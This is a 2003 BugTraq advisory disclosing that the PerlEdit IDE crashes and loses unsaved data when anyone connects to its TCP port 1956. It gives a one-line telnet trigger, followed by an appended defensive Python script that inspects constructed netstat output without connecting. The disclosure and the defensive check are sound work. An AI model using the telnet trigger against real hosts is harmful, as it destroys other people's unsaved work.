BugTraq
PerlEdit Jun 21 2003 08:47AM
morning_wood (se_cur_ity hotmail com)
------------------------------------------------------------------
- EXPL-A-2003-010 exploitlabs.com Advisory 010
------------------------------------------------------------------
-= PerlEdit =-

exploitlabs.com
June 21, 2003

Vulnerability:
-------------
Remote Buffer Overflow

Product:
--------
PerlEdit
http://www.indigostar.com/perledit.html
All versions to current ( 1.07 )

Description of product:
-----------------------
"PerlEdit is an IDE for Perl and a general-purpose text editor.
It includes a source code text editor with syntax highlighting
and a visual debugger."

screenshot: http://www.indigostar.com/perledit_screenshots.html

VULNERABILITY / EXPLOIT
=======================

Upon execution, perledit binds to local TCP port 1956.
Connecting via Telnet locally or remotely causes the program
to crash, resulting in a total loss of unsaved data.

------------- 'sploit -------------------------

telnet host-running-perledit 1956

READY

( exit telnet ) remote perledit crashes.

Further investigation may lead to more serious issues; I did not
pursue, as this was bad enough.

Local:
------
yes

Remote:
-------
yes

Vendor Fix:
-----------
No fix on 0day

Vendor Contact:
---------------
support (at) indigostar (dot) com - Concurrent with this advisory

Credits:
--------
Donnie Werner
http://exploitlabs.com
http://nothackers.org - Freedom of Voice - Freedom of Choice
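
An added example, not part of the original advisory: because a connect-and-disconnect probe of port 1956 would itself crash the editor, this Python script checks exposure passively by parsing `netstat -ano` output and classifying each listener's bind address. The sample output, PIDs and the function name `find_listeners` are constructed for illustration.

```python
import ipaddress
import re

PERLEDIT_PORT = 1956  # TCP port named in the advisory

# Constructed sample of Windows `netstat -ano` output (not captured from a real host).
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:1956           0.0.0.0:0              LISTENING       3044
  TCP    127.0.0.1:1956         127.0.0.1:49712        ESTABLISHED     3044
  TCP    192.168.1.20:49800     93.184.216.34:80       ESTABLISHED     2210
  TCP    [::1]:1956             [::]:0                 LISTENING       4100
  UDP    0.0.0.0:1956           *:*                                    777
"""

# Only TCP rows in LISTENING state: local address, local port, owning PID.
ROW = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+\S+\s+LISTENING\s+(\d+)\s*$")


def find_listeners(netstat_text, port=PERLEDIT_PORT):
    """Return [(bind_address, pid, exposure)] for TCP listeners on `port`.

    No connection is made to the port; only netstat text is inspected.
    """
    findings = []
    for line in netstat_text.splitlines():
        m = ROW.match(line)
        if not m or int(m.group(2)) != port:
            continue
        # Drop IPv6 brackets and any zone id before parsing the address.
        addr = m.group(1).strip("[]").split("%")[0]
        ip = ipaddress.ip_address(addr)
        # 0.0.0.0 / :: (all interfaces) and routable addresses count as exposed.
        exposure = "loopback-only" if ip.is_loopback else "network-reachable"
        findings.append((addr, int(m.group(3)), exposure))
    return findings


if __name__ == "__main__":
    for addr, pid, exposure in find_listeners(SAMPLE_NETSTAT):
        print(f"port {PERLEDIT_PORT} listening on {addr} (pid {pid}): {exposure}")
```

A listener reported as network-reachable can be filtered at the host firewall while no vendor fix exists.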
